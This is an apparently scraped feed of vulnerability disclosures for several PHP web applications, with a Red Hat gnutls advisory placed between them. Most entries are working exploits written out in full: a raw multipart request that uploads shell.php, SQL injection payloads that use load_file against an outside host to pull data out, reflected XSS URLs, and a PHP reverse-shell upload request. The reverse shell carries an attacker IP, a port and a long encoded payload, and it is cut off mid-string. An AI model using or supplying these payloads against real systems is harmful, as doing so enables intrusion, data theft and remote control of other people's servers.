Wedding Planner v1.0 is vulnerable to Arbitrary code execution via package_edit.php.

Permalink

Cannot retrieve contributors at this time

**Wedding Planner v1.0 by pushpam02 has arbitrary code execution (RCE)**

BUG\_Author: Tr0e

vendor: https://www.sourcecodester.com/php/15375/wedding-planner-project-php-free-download.html

Vulnerability url: http://ip/Wedding-Management-PHP/admin/package\_edit.php?id=1

Loophole location：The editing function of "Services" module in the background management system-- > there is an arbitrary file upload vulnerability (RCE) in the picture upload point of "package\_edit.php" file.

Click "Edit" to save

Request package for file upload：

POST /Wedding\-Management\-PHP/admin/package\_edit.php?id\=1 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/Wedding-Management-PHP/admin/package\_edit.php?id=1
Cookie: PHPSESSID=ncd6h7doujvbbft46r0m7mbr6s
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------2779055672062
Content-Length: 529
\-----------------------------2779055672062
Content-Disposition: form-data; name="wedding\_type"
2
\-----------------------------2779055672062
Content-Disposition: form-data; name="price"
0.00
\-----------------------------2779055672062
Content-Disposition: form-data; name="preview\_image"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------2779055672062
Content-Disposition: form-data; name="submit"
\-----------------------------2779055672062--

The files will be uploaded to this directory \\Wedding-Management-PHP\\admin\\upload\\categories

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-42229: bug_report/RCE-1.md at main · Tr0ee/bug_report

A vulnerability was found in SourceCodester Book Store Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /category.php. The manipulation of the argument category_name leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-210436.

CVE-2022-3452

Red Hat Security Advisory 2022-6854-01 - The gnutls packages provide the GNU Transport Layer Security library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS. Nettle is a cryptographic library that is designed to fit easily in almost any context: In crypto toolkits for object-oriented languages, such as C++, Python, or Pike, in applications like LSH or GNUPG, or even in kernel space. Issues addressed include a double free vulnerability.

-----BEGIN PGP SIGNED MESSAGE----- 
Hash: SHA256

==================================================================== 
Red Hat Security Advisory

Synopsis: Moderate: gnutls and nettle security, bug fix, and enhancement update 
Advisory ID: RHSA-2022:6854-01 
Product: Red Hat Enterprise Linux 
Advisory URL: https://access.redhat.com/errata/RHSA-2022:6854 
Issue date: 2022-10-11 
CVE Names: CVE-2022-2509 
==================================================================== 
1. Summary:

An update for gnutls and nettle is now available for Red Hat Enterprise 
Linux 9.

Red Hat Product Security has rated this update as having a security impact 
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which 
gives a detailed severity rating, is available for each vulnerability from 
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64 
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The gnutls packages provide the GNU Transport Layer Security (GnuTLS) 
library, which implements cryptographic algorithms and protocols such as 
SSL, TLS, and DTLS.

Nettle is a cryptographic library that is designed to fit easily in almost 
any context: In crypto toolkits for object-oriented languages, such as C++, 
Python, or Pike, in applications like LSH or GNUPG, or even in kernel 
space.

The following packages have been upgraded to a later upstream version: 
gnutls (3.7.6), nettle (3.8).

Security Fix(es):

* gnutls: Double free during gnutls_pkcs7_verify. (CVE-2022-2509)

For more details about the security issue(s), including the impact, a CVSS 
score, acknowledgments, and other related information, refer to the CVE 
page(s) listed in the References section.

Bug Fix(es):

* [IBM 9.1] [P10] POWER10 performance enhancements for cryptography: nettle 
- - incremental work (BZ#2102589)

* Allow enabling KTLS in RHEL 9.1 (BZ#2108532)

* DES-CBC bag is decryptable under FIPS (BZ#2115314)

* allow signature verification using RSA keys <2k in FIPS mode (BZ#2119770)

4. Solution:

For details on how to apply this update, which includes the changes 
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2076626 - FIPS module name should not contain the .0 from the /etc/os-release [rhel-9.0.0.z] 
2108635 - Input size for AES-GCM is not limited [rhel-9.0.0.z] 
2108977 - CVE-2022-2509 gnutls: Double free during gnutls_pkcs7_verify 
2119770 - allow signature verification using RSA keys <2k in FIPS mode [rhel-9.0.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64: 
gnutls-c++-3.7.6-12.el9_0.aarch64.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.aarch64.rpm 
gnutls-dane-3.7.6-12.el9_0.aarch64.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.aarch64.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.aarch64.rpm 
gnutls-debugsource-3.7.6-12.el9_0.aarch64.rpm 
gnutls-devel-3.7.6-12.el9_0.aarch64.rpm 
gnutls-utils-3.7.6-12.el9_0.aarch64.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.aarch64.rpm 
nettle-debuginfo-3.8-3.el9_0.aarch64.rpm 
nettle-debugsource-3.8-3.el9_0.aarch64.rpm 
nettle-devel-3.8-3.el9_0.aarch64.rpm

ppc64le: 
gnutls-c++-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-dane-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-debugsource-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-devel-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-utils-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.ppc64le.rpm 
nettle-debuginfo-3.8-3.el9_0.ppc64le.rpm 
nettle-debugsource-3.8-3.el9_0.ppc64le.rpm 
nettle-devel-3.8-3.el9_0.ppc64le.rpm

s390x: 
gnutls-c++-3.7.6-12.el9_0.s390x.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.s390x.rpm 
gnutls-dane-3.7.6-12.el9_0.s390x.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.s390x.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.s390x.rpm 
gnutls-debugsource-3.7.6-12.el9_0.s390x.rpm 
gnutls-devel-3.7.6-12.el9_0.s390x.rpm 
gnutls-utils-3.7.6-12.el9_0.s390x.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.s390x.rpm 
nettle-debuginfo-3.8-3.el9_0.s390x.rpm 
nettle-debugsource-3.8-3.el9_0.s390x.rpm 
nettle-devel-3.8-3.el9_0.s390x.rpm

x86_64: 
gnutls-c++-3.7.6-12.el9_0.i686.rpm 
gnutls-c++-3.7.6-12.el9_0.x86_64.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.i686.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.x86_64.rpm 
gnutls-dane-3.7.6-12.el9_0.i686.rpm 
gnutls-dane-3.7.6-12.el9_0.x86_64.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.i686.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.x86_64.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.i686.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.x86_64.rpm 
gnutls-debugsource-3.7.6-12.el9_0.i686.rpm 
gnutls-debugsource-3.7.6-12.el9_0.x86_64.rpm 
gnutls-devel-3.7.6-12.el9_0.i686.rpm 
gnutls-devel-3.7.6-12.el9_0.x86_64.rpm 
gnutls-utils-3.7.6-12.el9_0.x86_64.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.i686.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.x86_64.rpm 
nettle-debuginfo-3.8-3.el9_0.i686.rpm 
nettle-debuginfo-3.8-3.el9_0.x86_64.rpm 
nettle-debugsource-3.8-3.el9_0.i686.rpm 
nettle-debugsource-3.8-3.el9_0.x86_64.rpm 
nettle-devel-3.8-3.el9_0.i686.rpm 
nettle-devel-3.8-3.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source: 
gnutls-3.7.6-12.el9_0.src.rpm 
nettle-3.8-3.el9_0.src.rpm

aarch64: 
gnutls-3.7.6-12.el9_0.aarch64.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.aarch64.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.aarch64.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.aarch64.rpm 
gnutls-debugsource-3.7.6-12.el9_0.aarch64.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.aarch64.rpm 
nettle-3.8-3.el9_0.aarch64.rpm 
nettle-debuginfo-3.8-3.el9_0.aarch64.rpm 
nettle-debugsource-3.8-3.el9_0.aarch64.rpm

ppc64le: 
gnutls-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-debugsource-3.7.6-12.el9_0.ppc64le.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.ppc64le.rpm 
nettle-3.8-3.el9_0.ppc64le.rpm 
nettle-debuginfo-3.8-3.el9_0.ppc64le.rpm 
nettle-debugsource-3.8-3.el9_0.ppc64le.rpm

s390x: 
gnutls-3.7.6-12.el9_0.s390x.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.s390x.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.s390x.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.s390x.rpm 
gnutls-debugsource-3.7.6-12.el9_0.s390x.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.s390x.rpm 
nettle-3.8-3.el9_0.s390x.rpm 
nettle-debuginfo-3.8-3.el9_0.s390x.rpm 
nettle-debugsource-3.8-3.el9_0.s390x.rpm

x86_64: 
gnutls-3.7.6-12.el9_0.i686.rpm 
gnutls-3.7.6-12.el9_0.x86_64.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.i686.rpm 
gnutls-c++-debuginfo-3.7.6-12.el9_0.x86_64.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.i686.rpm 
gnutls-dane-debuginfo-3.7.6-12.el9_0.x86_64.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.i686.rpm 
gnutls-debuginfo-3.7.6-12.el9_0.x86_64.rpm 
gnutls-debugsource-3.7.6-12.el9_0.i686.rpm 
gnutls-debugsource-3.7.6-12.el9_0.x86_64.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.i686.rpm 
gnutls-utils-debuginfo-3.7.6-12.el9_0.x86_64.rpm 
nettle-3.8-3.el9_0.i686.rpm 
nettle-3.8-3.el9_0.x86_64.rpm 
nettle-debuginfo-3.8-3.el9_0.i686.rpm 
nettle-debuginfo-3.8-3.el9_0.x86_64.rpm 
nettle-debugsource-3.8-3.el9_0.i686.rpm 
nettle-debugsource-3.8-3.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and 
details on how to verify the signature are available from 
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2509 
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact 
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc. 
-----BEGIN PGP SIGNATURE----- 
Version: GnuPG v1

iQIVAwUBY0UvudzjgjWX9erEAQhEexAAgATTMTqhPJv6D78FKfvSqgh3Xiym0rzU 
TNZ5y42a8sTuQit7YO89QJH6e1BEpTFL2yA9IbBFB4VaaDJ8TjuzqvZex6/5Xnxt 
+ssAi7v7p++YXnC9qJmM0X2NTTJX8EWHcVa8OU0qY40EEz2kdkp/FBJlxLuwIGYH 
IWJ7lHM6CqZ4GErGw+saq2hypc4vmBm/dgUAOvaUBHj2pHpWcmXmh1531gAhNgjA 
DkDOiRpu4bNDEr8yHlkR4bhrLAEfvwrM/E/l9Cem153VGxK8OOr4YwpdF0AEA6cf 
5kMPKFX7QrReCPeFFvQT2t/oh+gYMFIP3Fq6TQZhgT3hK0GjnpcTuiYZ+HOCIbgS 
8pCkEaKu3D9M7GesHzry+Z4WVl6xWZ3gbVQhhBXxu5z6lgL7kaT6RjvSX2ZuZBsL 
hVzpfaEVkvTUTtgk12iDl8PWMqCANS3fJDrRG8tDODg+HQstJzhjACUVUP0dx8yb 
age1HR1mo8LBPBESm8HeG+O/dkVOwHfGT2pnbMpA6Jf4a3veikvPwquV59O9bj9h 
E+PnqyxyOSm9WunMh91amh1/xtkFfv7XWIG1A3j9p+EvQAVJwbWlN83dP85Q/ahx 
jBn2XP36JkcVxDq5FrqlKRu6vAWJEbtTRd0YQNxJnDiAlFJsBpFIzJm1u8E6/KpH 
tDUVldzkRiA=/Kef 
-----END PGP SIGNATURE----- 
-- 
RHSA-announce mailing list 
RHSA-announce@redhat.com 
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6854-01

The Download Monitor WordPress plugin before 4.5.98 does not ensure that files to be downloaded are inside the blog folders, and not sensitive, allowing high privilege users such as admin to download the wp-config.php or /etc/passwd even in an hardened environment or multisite setup.

CVE-2022-2981

Online Shopping System Advanced version 1.0 suffers from multiple remote SQL injection vulnerabilities.

The online-shopping-system-advanced-1.0 suffers from multiple SQLiThe attacker can steal all information from the database of this system.Status: CRITICAL[+] Exploit:```MYSQLParameter: cid (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''OR NOT 4084=4084 AND 'icSi'='icSi Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 3031 FROM(SELECT COUNT(*),CONCAT(0x716a707a71,(SELECT(ELT(3031=3031,1))),0x716a717871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwMy'='gwMy Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''AND (SELECT 4189 FROM (SELECT(SLEEP(17)))bNrO) AND 'UbMN'='UbMN Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: getProduct=1&setPage=1&pageNumber=1&cid=2'+(selectload_file('\\\\oum6bh09wi5ca5njey591t5q7hda11upls9kwdk2.tupmangal.net\\miu'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a707a71,0x7a4e4f74416a58717749646143726a6e68714368626556676e756d7076764867677176516b58684f,0x716a717871),NULL,NULL,NULL#```--------------------------------------------------------------------------------------------```MYSQLParameter: password (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT7287 FROM(SELECT COUNT(*),CONCAT(0x71766a6b71,(SELECT(ELT(7287=7287,1))),0x7171716b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# oUWI&remember-me=on Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: email=wGpFwAQH@tupmangal.net&password=e2H!l7r!I2' AND (SELECT7259 FROM (SELECT(SLEEP(17)))yXIE)# kWgA&remember-me=on````--------------------------------------------------------------------------------------------```MYSQL```## And more:```txt[1.1. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.2. http://pwnedhost.com/online-shopping-system-advanced/action.php [cidparameter]][1.3. http://pwnedhost.com/online-shopping-system-advanced/login.php[password parameter]][1.4. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.5. http://pwnedhost.com/online-shopping-system-advanced/product.php [pparameter]][1.6. http://pwnedhost.com/online-shopping-system-advanced/review.php[email parameter]][1.7. http://pwnedhost.com/online-shopping-system-advanced/review.php [nameparameter]]```PoC:https://github.com/PuneethReddyHC/online-shopping-system-advanced/issues/51-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

Online Shopping System Advanced 1.0 SQL Injection

Joomla Vik Rent Car extension version 1.14 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable Crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Rent Car 1.14                                                   ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘parameter 'returnplace' is vulnerable to XSSPath: index.php/en/search-your-car https://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=l2cno%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efobrc&task=showprc&Itemid=104&categories=2&goon=Continueparameter 'categories' is vulnerable to XSSPath: index.php/en/search-your-carhttps://extensionsforjoomla.com/livedemo/vikrentcar/index.php/en/search-your-car?option=com_vikrentcar&caropt=4&days=1&pickup=1665565200&release=1665644400&place=2&returnplace=3&task=showprc&Itemid=104&categories=o41bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eml8z0&goon=Continue[-] Done

Joomla Vik Rent Car 1.14 Cross Site Scripting

Web Based Student Clearance version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Web Based Student Clearance 1.0 - Unrestricted File Upload 
leads to Remote Code Execution (Authenticated) 
# Date: 08-10-2022 
# Exploit Author: Akash Pandey ( L3V1ATH0N ) 
# Vendor Homepage: 
https://www.sourcecodester.com/php/15627/web-based-student-clearance-system.html 
# Software Link: 
https://www.sourcecodester.com/download-code?nid=15627&title=Web-Based+Student+Clearance+System+in+PHP+Free+Source+Code 
# Version: v1.0 
# Tested on: Windows, XAMPP, Kali Linux 
# CVE :

----- POC -----

Note : The reverse shell below is for Windows based PHP reverse shell. 
If the target host is using Linux then the Linux based PHP reverse shell 
must be used.

---------------

Request : URL - 
http://localhost/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
=========

POST 
/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
HTTP/1.1 
Host: 192.168.1.12 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 
Firefox/91.0 
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Content-Type: multipart/form-data; 
boundary=---------------------------71268058833541201443517047173 
Content-Length: 6864 
Origin: http://192.168.1.12 
Connection: close 
Referer: 
http://192.168.1.12/student_clearance_system_Aurthur_Javis/student_clearance_system_Aurthur_Javis/edit-photo.php 
Cookie: PHPSESSID=9rnst2bfmbtrgapqsalerlrdjm 
Upgrade-Insecure-Requests: 1

-----------------------------71268058833541201443517047173

Content-Disposition: form-data; name="userImage"; filename="shell.php" 
Content-Type: application/x-php

<?php

header('Content-type: text/plain'); 
$ip = "192.168.1.26"; //change this 
$port = "80"; //change this 
$payload = 
"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